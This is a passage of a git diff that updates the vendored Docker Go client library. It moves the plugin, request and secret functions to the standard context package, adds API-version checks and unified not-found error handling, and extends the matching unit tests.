assert.Check(t, is.ErrorContains(err, "")) + assert.Check(t, is.Equal(false, ping.Experimental)) + assert.Check(t, is.Equal("", ping.APIVersion)) +} + +// TestPingSuccess tests that we are able to get the expected API headers/ping +// details on success. +func TestPingSuccess(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + resp := &http.Response{StatusCode: http.StatusInternalServerError} + resp.Header = http.Header{} + resp.Header.Set("API-Version", "awesome") + resp.Header.Set("Docker-Experimental", "true") + resp.Body = ioutil.NopCloser(strings.NewReader("some error with the server")) + return resp, nil + }), + } + ping, err := client.Ping(context.Background()) + assert.Check(t, is.ErrorContains(err, "")) + assert.Check(t, is.Equal(true, ping.Experimental)) + assert.Check(t, is.Equal("awesome", ping.APIVersion)) +} diff --git a/vendor/github.com/docker/docker/client/plugin_create.go b/vendor/github.com/docker/docker/client/plugin_create.go index a660ba5733..4591db50fd 100644 --- a/vendor/github.com/docker/docker/client/plugin_create.go +++ b/vendor/github.com/docker/docker/client/plugin_create.go @@ -1,18 +1,18 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/http" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // PluginCreate creates a plugin func (cli *Client) PluginCreate(ctx context.Context, createContext io.Reader, createOptions types.PluginCreateOptions) error { headers := http.Header(make(map[string][]string)) - headers.Set("Content-Type", "application/tar") + headers.Set("Content-Type", "application/x-tar") query := url.Values{} query.Set("name", createOptions.RepoName) diff --git a/vendor/github.com/docker/docker/client/plugin_disable.go b/vendor/github.com/docker/docker/client/plugin_disable.go index 30467db742..01f6574f95 100644 --- a/vendor/github.com/docker/docker/client/plugin_disable.go +++ b/vendor/github.com/docker/docker/client/plugin_disable.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // PluginDisable disables a plugin diff --git a/vendor/github.com/docker/docker/client/plugin_disable_test.go b/vendor/github.com/docker/docker/client/plugin_disable_test.go index a4de45be2d..ac2413d6c5 100644 --- a/vendor/github.com/docker/docker/client/plugin_disable_test.go +++ b/vendor/github.com/docker/docker/client/plugin_disable_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -9,7 +10,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestPluginDisableError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/plugin_enable.go b/vendor/github.com/docker/docker/client/plugin_enable.go index 95517c4b80..736da48bd1 100644 --- a/vendor/github.com/docker/docker/client/plugin_enable.go +++ b/vendor/github.com/docker/docker/client/plugin_enable.go @@ -1,11 +1,11 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "strconv" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // PluginEnable enables a plugin diff --git a/vendor/github.com/docker/docker/client/plugin_enable_test.go b/vendor/github.com/docker/docker/client/plugin_enable_test.go index b27681348f..911ccaf1e9 100644 --- a/vendor/github.com/docker/docker/client/plugin_enable_test.go +++ b/vendor/github.com/docker/docker/client/plugin_enable_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -9,7 +10,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestPluginEnableError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/plugin_inspect.go b/vendor/github.com/docker/docker/client/plugin_inspect.go index 89f39ee2c6..0ab7beaee8 100644 --- a/vendor/github.com/docker/docker/client/plugin_inspect.go +++ b/vendor/github.com/docker/docker/client/plugin_inspect.go @@ -1,23 +1,22 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "io/ioutil" - "net/http" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // PluginInspectWithRaw inspects an existing plugin func (cli *Client) PluginInspectWithRaw(ctx context.Context, name string) (*types.Plugin, []byte, error) { + if name == "" { + return nil, nil, objectNotFoundError{object: "plugin", id: name} + } resp, err := cli.get(ctx, "/plugins/"+name+"/json", nil, nil) if err != nil { - if resp.statusCode == http.StatusNotFound { - return nil, nil, pluginNotFoundError{name} - } - return nil, nil, err + return nil, nil, wrapResponseError(err, resp, "plugin", name) } defer ensureReaderClosed(resp) diff --git a/vendor/github.com/docker/docker/client/plugin_inspect_test.go b/vendor/github.com/docker/docker/client/plugin_inspect_test.go index fae407eb9b..74ca0f0fc0 100644 --- a/vendor/github.com/docker/docker/client/plugin_inspect_test.go +++ b/vendor/github.com/docker/docker/client/plugin_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,7 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/pkg/errors" ) func TestPluginInspectError(t *testing.T) { @@ -24,6 +25,18 @@ func TestPluginInspectError(t *testing.T) { } } +func TestPluginInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.PluginInspectWithRaw(context.Background(), "") + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) + } +} + func TestPluginInspect(t *testing.T) { expectedURL := "/plugins/plugin_name" client := &Client{ diff --git a/vendor/github.com/docker/docker/client/plugin_install.go b/vendor/github.com/docker/docker/client/plugin_install.go index 3217c4cf39..13baa40a9b 100644 --- a/vendor/github.com/docker/docker/client/plugin_install.go +++ b/vendor/github.com/docker/docker/client/plugin_install.go @@ -1,6 +1,7 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "io" "net/http" @@ -9,13 +10,12 @@ import ( "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" "github.com/pkg/errors" - "golang.org/x/net/context" ) // PluginInstall installs a plugin func (cli *Client) PluginInstall(ctx context.Context, name string, options types.PluginInstallOptions) (rc io.ReadCloser, err error) { query := url.Values{} - if _, err := reference.ParseNamed(options.RemoteRef); err != nil { + if _, err := reference.ParseNormalizedNamed(options.RemoteRef); err != nil { return nil, errors.Wrap(err, "invalid remote reference") } query.Set("remote", options.RemoteRef) @@ -60,8 +60,8 @@ func (cli *Client) PluginInstall(ctx context.Context, name string, options types return } - err = cli.PluginEnable(ctx, name, types.PluginEnableOptions{Timeout: 0}) - pw.CloseWithError(err) + enableErr := cli.PluginEnable(ctx, name, types.PluginEnableOptions{Timeout: 0}) + pw.CloseWithError(enableErr) }() return pr, nil } diff --git a/vendor/github.com/docker/docker/client/plugin_list.go b/vendor/github.com/docker/docker/client/plugin_list.go index 88c480a3e1..ade1051a97 100644 --- a/vendor/github.com/docker/docker/client/plugin_list.go +++ b/vendor/github.com/docker/docker/client/plugin_list.go @@ -1,18 +1,29 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" + "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/filters" ) // PluginList returns the installed plugins -func (cli *Client) PluginList(ctx context.Context) (types.PluginsListResponse, error) { +func (cli *Client) PluginList(ctx context.Context, filter filters.Args) (types.PluginsListResponse, error) { var plugins types.PluginsListResponse - resp, err := cli.get(ctx, "/plugins", nil, nil) + query := url.Values{} + + if filter.Len() > 0 { + filterJSON, err := filters.ToParamWithVersion(cli.version, filter) + if err != nil { + return plugins, err + } + query.Set("filters", filterJSON) + } + resp, err := cli.get(ctx, "/plugins", query, nil) if err != nil { - return plugins, err + return plugins, wrapResponseError(err, resp, "plugin", "") } err = json.NewDecoder(resp.body).Decode(&plugins) diff --git a/vendor/github.com/docker/docker/client/plugin_list_test.go b/vendor/github.com/docker/docker/client/plugin_list_test.go index 173e4b87f5..7dc351dceb 100644 --- a/vendor/github.com/docker/docker/client/plugin_list_test.go +++ b/vendor/github.com/docker/docker/client/plugin_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,7 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/filters" ) func TestPluginListError(t *testing.T) { @@ -18,7 +19,7 @@ func TestPluginListError(t *testing.T) { client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } - _, err := client.PluginList(context.Background()) + _, err := client.PluginList(context.Background(), filters.NewArgs()) if err == nil || err.Error() != "Error response from daemon: Server error" { t.Fatalf("expected a Server Error, got %v", err) } @@ -26,34 +27,81 @@ func TestPluginListError(t *testing.T) { func TestPluginList(t *testing.T) { expectedURL := "/plugins" - client := &Client{ - client: newMockClient(func(req *http.Request) (*http.Response, error) { - if !strings.HasPrefix(req.URL.Path, expectedURL) { - return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) - } - content, err := json.Marshal([]*types.Plugin{ - { - ID: "plugin_id1", - }, - { - ID: "plugin_id2", - }, - }) - if err != nil { - return nil, err - } - return &http.Response{ - StatusCode: http.StatusOK, - Body: ioutil.NopCloser(bytes.NewReader(content)), - }, nil - }), - } - plugins, err := client.PluginList(context.Background()) - if err != nil { - t.Fatal(err) + enabledFilters := filters.NewArgs() + enabledFilters.Add("enabled", "true") + + capabilityFilters := filters.NewArgs() + capabilityFilters.Add("capability", "volumedriver") + capabilityFilters.Add("capability", "authz") + + listCases := []struct { + filters filters.Args + expectedQueryParams map[string]string + }{ + { + filters: filters.NewArgs(), + expectedQueryParams: map[string]string{ + "all": "", + "filter": "", + "filters": "", + }, + }, + { + filters: enabledFilters, + expectedQueryParams: map[string]string{ + "all": "", + "filter": "", + "filters": `{"enabled":{"true":true}}`, + }, + }, + { + filters: capabilityFilters, + expectedQueryParams: map[string]string{ + "all": "", + "filter": "", + "filters": `{"capability":{"authz":true,"volumedriver":true}}`, + }, + }, } - if len(plugins) != 2 { - t.Fatalf("expected 2 plugins, got %v", plugins) + + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + content, err := json.Marshal([]*types.Plugin{ + { + ID: "plugin_id1", + }, + { + ID: "plugin_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + plugins, err := client.PluginList(context.Background(), listCase.filters) + if err != nil { + t.Fatal(err) + } + if len(plugins) != 2 { + t.Fatalf("expected 2 plugins, got %v", plugins) + } } } diff --git a/vendor/github.com/docker/docker/client/plugin_push.go b/vendor/github.com/docker/docker/client/plugin_push.go index 1e5f963251..d20bfe8447 100644 --- a/vendor/github.com/docker/docker/client/plugin_push.go +++ b/vendor/github.com/docker/docker/client/plugin_push.go @@ -1,9 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" - - "golang.org/x/net/context" ) // PluginPush pushes a plugin to a registry diff --git a/vendor/github.com/docker/docker/client/plugin_push_test.go b/vendor/github.com/docker/docker/client/plugin_push_test.go index d9f70cdff8..20b23a1173 100644 --- a/vendor/github.com/docker/docker/client/plugin_push_test.go +++ b/vendor/github.com/docker/docker/client/plugin_push_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestPluginPushError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/plugin_remove.go b/vendor/github.com/docker/docker/client/plugin_remove.go index b017e4d348..8563bab0db 100644 --- a/vendor/github.com/docker/docker/client/plugin_remove.go +++ b/vendor/github.com/docker/docker/client/plugin_remove.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // PluginRemove removes a plugin @@ -16,5 +16,5 @@ func (cli *Client) PluginRemove(ctx context.Context, name string, options types. resp, err := cli.delete(ctx, "/plugins/"+name, query, nil) ensureReaderClosed(resp) - return err + return wrapResponseError(err, resp, "plugin", name) } diff --git a/vendor/github.com/docker/docker/client/plugin_remove_test.go b/vendor/github.com/docker/docker/client/plugin_remove_test.go index a15f1661f6..e6c76342ee 100644 --- a/vendor/github.com/docker/docker/client/plugin_remove_test.go +++ b/vendor/github.com/docker/docker/client/plugin_remove_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -9,8 +10,6 @@ import ( "testing" "github.com/docker/docker/api/types" - - "golang.org/x/net/context" ) func TestPluginRemoveError(t *testing.T) { @@ -33,7 +32,7 @@ func TestPluginRemove(t *testing.T) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) } if req.Method != "DELETE" { - return nil, fmt.Errorf("expected POST method, got %s", req.Method) + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) } return &http.Response{ StatusCode: http.StatusOK, diff --git a/vendor/github.com/docker/docker/client/plugin_set.go b/vendor/github.com/docker/docker/client/plugin_set.go index 3260d2a90d..dcf5752ca2 100644 --- a/vendor/github.com/docker/docker/client/plugin_set.go +++ b/vendor/github.com/docker/docker/client/plugin_set.go @@ -1,7 +1,7 @@ -package client +package client // import "github.com/docker/docker/client" import ( - "golang.org/x/net/context" + "context" ) // PluginSet modifies settings for an existing plugin diff --git a/vendor/github.com/docker/docker/client/plugin_set_test.go b/vendor/github.com/docker/docker/client/plugin_set_test.go index 2450254463..2e97904b86 100644 --- a/vendor/github.com/docker/docker/client/plugin_set_test.go +++ b/vendor/github.com/docker/docker/client/plugin_set_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestPluginSetError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/plugin_upgrade.go b/vendor/github.com/docker/docker/client/plugin_upgrade.go index 95a4356b97..115cea945b 100644 --- a/vendor/github.com/docker/docker/client/plugin_upgrade.go +++ b/vendor/github.com/docker/docker/client/plugin_upgrade.go @@ -1,20 +1,22 @@ -package client +package client // import "github.com/docker/docker/client" import ( - "fmt" + "context" "io" "net/url" "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" "github.com/pkg/errors" - "golang.org/x/net/context" ) // PluginUpgrade upgrades a plugin func (cli *Client) PluginUpgrade(ctx context.Context, name string, options types.PluginInstallOptions) (rc io.ReadCloser, err error) { + if err := cli.NewVersionError("1.26", "plugin upgrade"); err != nil { + return nil, err + } query := url.Values{} - if _, err := reference.ParseNamed(options.RemoteRef); err != nil { + if _, err := reference.ParseNormalizedNamed(options.RemoteRef); err != nil { return nil, errors.Wrap(err, "invalid remote reference") } query.Set("remote", options.RemoteRef) @@ -33,5 +35,5 @@ func (cli *Client) PluginUpgrade(ctx context.Context, name string, options types func (cli *Client) tryPluginUpgrade(ctx context.Context, query url.Values, privileges types.PluginPrivileges, name, registryAuth string) (serverResponse, error) { headers := map[string][]string{"X-Registry-Auth": {registryAuth}} - return cli.post(ctx, fmt.Sprintf("/plugins/%s/upgrade", name), query, privileges, headers) + return cli.post(ctx, "/plugins/"+name+"/upgrade", query, privileges, headers) } diff --git a/vendor/github.com/docker/docker/client/request.go b/vendor/github.com/docker/docker/client/request.go index ac05363655..a19d62aa52 100644 --- a/vendor/github.com/docker/docker/client/request.go +++ b/vendor/github.com/docker/docker/client/request.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io" @@ -15,7 +16,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/versions" "github.com/pkg/errors" - "golang.org/x/net/context" "golang.org/x/net/context/ctxhttp" ) @@ -24,6 +24,7 @@ type serverResponse struct { body io.ReadCloser header http.Header statusCode int + reqURL *url.URL } // head sends an http request to the docker API using the method HEAD. @@ -31,12 +32,12 @@ func (cli *Client) head(ctx context.Context, path string, query url.Values, head return cli.sendRequest(ctx, "HEAD", path, query, nil, headers) } -// getWithContext sends an http request to the docker API using the method GET with a specific go context. +// get sends an http request to the docker API using the method GET with a specific Go context. func (cli *Client) get(ctx context.Context, path string, query url.Values, headers map[string][]string) (serverResponse, error) { return cli.sendRequest(ctx, "GET", path, query, nil, headers) } -// postWithContext sends an http request to the docker API using the method POST with a specific go context. +// post sends an http request to the docker API using the method POST with a specific Go context. func (cli *Client) post(ctx context.Context, path string, query url.Values, obj interface{}, headers map[string][]string) (serverResponse, error) { body, headers, err := encodeBody(obj, headers) if err != nil { @@ -58,7 +59,7 @@ func (cli *Client) put(ctx context.Context, path string, query url.Values, obj i return cli.sendRequest(ctx, "PUT", path, query, body, headers) } -// put sends an http request to the docker API using the method PUT. +// putRaw sends an http request to the docker API using the method PUT. func (cli *Client) putRaw(ctx context.Context, path string, query url.Values, body io.Reader, headers map[string][]string) (serverResponse, error) { return cli.sendRequest(ctx, "PUT", path, query, body, headers) } @@ -118,11 +119,15 @@ func (cli *Client) sendRequest(ctx context.Context, method, path string, query u if err != nil { return serverResponse{}, err } - return cli.doRequest(ctx, req) + resp, err := cli.doRequest(ctx, req) + if err != nil { + return resp, err + } + return resp, cli.checkResponseErr(resp) } func (cli *Client) doRequest(ctx context.Context, req *http.Request) (serverResponse, error) { - serverResp := serverResponse{statusCode: -1} + serverResp := serverResponse{statusCode: -1, reqURL: req.URL} resp, err := ctxhttp.Do(ctx, cli.client, req) if err != nil { @@ -165,7 +170,7 @@ func (cli *Client) doRequest(ctx context.Context, req *http.Request) (serverResp // daemon on Windows where the daemon is listening on a named pipe // `//./pipe/docker_engine, and the client must be running elevated. // Give users a clue rather than the not-overly useful message - // such as `error during connect: Get http://%2F%2F.%2Fpipe%2Fdocker_engine/v1.25/info: + // such as `error during connect: Get http://%2F%2F.%2Fpipe%2Fdocker_engine/v1.26/info: // open //./pipe/docker_engine: The system cannot find the file specified.`. // Note we can't string compare "The system cannot find the file specified" as // this is localised - for example in French the error would be @@ -179,35 +184,42 @@ func (cli *Client) doRequest(ctx context.Context, req *http.Request) (serverResp if resp != nil { serverResp.statusCode = resp.StatusCode + serverResp.body = resp.Body + serverResp.header = resp.Header } + return serverResp, nil +} - if serverResp.statusCode < 200 || serverResp.statusCode >= 400 { - body, err := ioutil.ReadAll(resp.Body) - if err != nil { - return serverResp, err - } - if len(body) == 0 { - return serverResp, fmt.Errorf("Error: request returned %s for API route and version %s, check if the server supports the requested API version", http.StatusText(serverResp.statusCode), req.URL) - } +func (cli *Client) checkResponseErr(serverResp serverResponse) error { + if serverResp.statusCode >= 200 && serverResp.statusCode < 400 { + return nil + } - var errorMessage string - if (cli.version == "" || versions.GreaterThan(cli.version, "1.23")) && - resp.Header.Get("Content-Type") == "application/json" { - var errorResponse types.ErrorResponse - if err := json.Unmarshal(body, &errorResponse); err != nil { - return serverResp, fmt.Errorf("Error reading JSON: %v", err) - } - errorMessage = errorResponse.Message - } else { - errorMessage = string(body) - } + body, err := ioutil.ReadAll(serverResp.body) + if err != nil { + return err + } + if len(body) == 0 { + return fmt.Errorf("request returned %s for API route and version %s, check if the server supports the requested API version", http.StatusText(serverResp.statusCode), serverResp.reqURL) + } - return serverResp, fmt.Errorf("Error response from daemon: %s", strings.TrimSpace(errorMessage)) + var ct string + if serverResp.header != nil { + ct = serverResp.header.Get("Content-Type") } - serverResp.body = resp.Body - serverResp.header = resp.Header - return serverResp, nil + var errorMessage string + if (cli.version == "" || versions.GreaterThan(cli.version, "1.23")) && ct == "application/json" { + var errorResponse types.ErrorResponse + if err := json.Unmarshal(body, &errorResponse); err != nil { + return fmt.Errorf("Error reading JSON: %v", err) + } + errorMessage = errorResponse.Message + } else { + errorMessage = string(body) + } + + return fmt.Errorf("Error response from daemon: %s", strings.TrimSpace(errorMessage)) } func (cli *Client) addHeaders(req *http.Request, headers headers) *http.Request { @@ -239,9 +251,9 @@ func encodeData(data interface{}) (*bytes.Buffer, error) { } func ensureReaderClosed(response serverResponse) { - if body := response.body; body != nil { + if response.body != nil { // Drain up to 512 bytes and close the body to let the Transport reuse the connection - io.CopyN(ioutil.Discard, body, 512) + io.CopyN(ioutil.Discard, response.body, 512) response.body.Close() } } diff --git a/vendor/github.com/docker/docker/client/request_test.go b/vendor/github.com/docker/docker/client/request_test.go index 63908aec4b..fda4d88aa1 100644 --- a/vendor/github.com/docker/docker/client/request_test.go +++ b/vendor/github.com/docker/docker/client/request_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -9,7 +10,7 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "gotest.tools/assert" ) // TestSetHostHeader should set fake host for local communications, set real host @@ -44,10 +45,8 @@ func TestSetHostHeader(t *testing.T) { } for c, test := range testCases { - proto, addr, basePath, err := ParseHost(test.host) - if err != nil { - t.Fatal(err) - } + hostURL, err := ParseHostURL(test.host) + assert.NilError(t, err) client := &Client{ client: newMockClient(func(req *http.Request) (*http.Response, error) { @@ -62,19 +61,17 @@ func TestSetHostHeader(t *testing.T) { } return &http.Response{ StatusCode: http.StatusOK, - Body: ioutil.NopCloser(bytes.NewReader(([]byte("")))), + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), }, nil }), - proto: proto, - addr: addr, - basePath: basePath, + proto: hostURL.Scheme, + addr: hostURL.Host, + basePath: hostURL.Path, } _, err = client.sendRequest(context.Background(), "GET", testURL, nil, nil, nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) } } diff --git a/vendor/github.com/docker/docker/client/secret_create.go b/vendor/github.com/docker/docker/client/secret_create.go index de8b041567..09fae82f2a 100644 --- a/vendor/github.com/docker/docker/client/secret_create.go +++ b/vendor/github.com/docker/docker/client/secret_create.go @@ -1,19 +1,20 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // SecretCreate creates a new Secret. func (cli *Client) SecretCreate(ctx context.Context, secret swarm.SecretSpec) (types.SecretCreateResponse, error) { - var headers map[string][]string - var response types.SecretCreateResponse - resp, err := cli.post(ctx, "/secrets/create", nil, secret, headers) + if err := cli.NewVersionError("1.25", "secret create"); err != nil { + return response, err + } + resp, err := cli.post(ctx, "/secrets/create", nil, secret, nil) if err != nil { return response, err } diff --git a/vendor/github.com/docker/docker/client/secret_create_test.go b/vendor/github.com/docker/docker/client/secret_create_test.go index cb378c77ff..419bdbcbc6 100644 --- a/vendor/github.com/docker/docker/client/secret_create_test.go +++ b/vendor/github.com/docker/docker/client/secret_create_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -11,12 +12,23 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) +func TestSecretCreateUnsupported(t *testing.T) { + client := &Client{ + version: "1.24", + client: &http.Client{}, + } + _, err := client.SecretCreate(context.Background(), swarm.SecretSpec{}) + assert.Check(t, is.Error(err, `"secret create" requires API version 1.25, but the Docker daemon API version is 1.24`)) +} + func TestSecretCreateError(t *testing.T) { client := &Client{ - client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + version: "1.25", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } _, err := client.SecretCreate(context.Background(), swarm.SecretSpec{}) if err == nil || err.Error() != "Error response from daemon: Server error" { @@ -25,8 +37,9 @@ func TestSecretCreateError(t *testing.T) { } func TestSecretCreate(t *testing.T) { - expectedURL := "/secrets/create" + expectedURL := "/v1.25/secrets/create" client := &Client{ + version: "1.25", client: newMockClient(func(req *http.Request) (*http.Response, error) { if !strings.HasPrefix(req.URL.Path, expectedURL) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) diff --git a/vendor/github.com/docker/docker/client/secret_inspect.go b/vendor/github.com/docker/docker/client/secret_inspect.go index f774576118..e8322f4589 100644 --- a/vendor/github.com/docker/docker/client/secret_inspect.go +++ b/vendor/github.com/docker/docker/client/secret_inspect.go @@ -1,23 +1,25 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "io/ioutil" - "net/http" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // SecretInspectWithRaw returns the secret information with raw data func (cli *Client) SecretInspectWithRaw(ctx context.Context, id string) (swarm.Secret, []byte, error) { + if err := cli.NewVersionError("1.25", "secret inspect"); err != nil { + return swarm.Secret{}, nil, err + } + if id == "" { + return swarm.Secret{}, nil, objectNotFoundError{object: "secret", id: id} + } resp, err := cli.get(ctx, "/secrets/"+id, nil, nil) if err != nil { - if resp.statusCode == http.StatusNotFound { - return swarm.Secret{}, nil, secretNotFoundError{id} - } - return swarm.Secret{}, nil, err + return swarm.Secret{}, nil, wrapResponseError(err, resp, "secret", id) } defer ensureReaderClosed(resp) diff --git a/vendor/github.com/docker/docker/client/secret_inspect_test.go b/vendor/github.com/docker/docker/client/secret_inspect_test.go index 423d986968..6c84799b17 100644 --- a/vendor/github.com/docker/docker/client/secret_inspect_test.go +++ b/vendor/github.com/docker/docker/client/secret_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,12 +11,24 @@ import ( "testing" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" + "github.com/pkg/errors" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) +func TestSecretInspectUnsupported(t *testing.T) { + client := &Client{ + version: "1.24", + client: &http.Client{}, + } + _, _, err := client.SecretInspectWithRaw(context.Background(), "nothing") + assert.Check(t, is.Error(err, `"secret inspect" requires API version 1.25, but the Docker daemon API version is 1.24`)) +} + func TestSecretInspectError(t *testing.T) { client := &Client{ - client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + version: "1.25", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } _, _, err := client.SecretInspectWithRaw(context.Background(), "nothing") @@ -26,18 +39,32 @@ func TestSecretInspectError(t *testing.T) { func TestSecretInspectSecretNotFound(t *testing.T) { client := &Client{ - client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + version: "1.25", + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), } _, _, err := client.SecretInspectWithRaw(context.Background(), "unknown") - if err == nil || !IsErrSecretNotFound(err) { - t.Fatalf("expected an secretNotFoundError error, got %v", err) + if err == nil || !IsErrNotFound(err) { + t.Fatalf("expected a secretNotFoundError error, got %v", err) + } +} + +func TestSecretInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.SecretInspectWithRaw(context.Background(), "") + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) } } func TestSecretInspect(t *testing.T) { - expectedURL := "/secrets/secret_id" + expectedURL := "/v1.25/secrets/secret_id" client := &Client{ + version: "1.25", client: newMockClient(func(req *http.Request) (*http.Response, error) { if !strings.HasPrefix(req.URL.Path, expectedURL) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) diff --git a/vendor/github.com/docker/docker/client/secret_list.go b/vendor/github.com/docker/docker/client/secret_list.go index 7e9d5ec167..f6bf7ba470 100644 --- a/vendor/github.com/docker/docker/client/secret_list.go +++ b/vendor/github.com/docker/docker/client/secret_list.go @@ -1,21 +1,24 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // SecretList returns the list of secrets. func (cli *Client) SecretList(ctx context.Context, options types.SecretListOptions) ([]swarm.Secret, error) { + if err := cli.NewVersionError("1.25", "secret list"); err != nil { + return nil, err + } query := url.Values{} if options.Filters.Len() > 0 { - filterJSON, err := filters.ToParam(options.Filters) + filterJSON, err := filters.ToJSON(options.Filters) if err != nil { return nil, err } diff --git a/vendor/github.com/docker/docker/client/secret_list_test.go b/vendor/github.com/docker/docker/client/secret_list_test.go index 1ac11cddb3..72323b055f 100644 --- a/vendor/github.com/docker/docker/client/secret_list_test.go +++ b/vendor/github.com/docker/docker/client/secret_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -12,12 +13,23 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) +func TestSecretListUnsupported(t *testing.T) { + client := &Client{ + version: "1.24", + client: &http.Client{}, + } + _, err := client.SecretList(context.Background(), types.SecretListOptions{}) + assert.Check(t, is.Error(err, `"secret list" requires API version 1.25, but the Docker daemon API version is 1.24`)) +} + func TestSecretListError(t 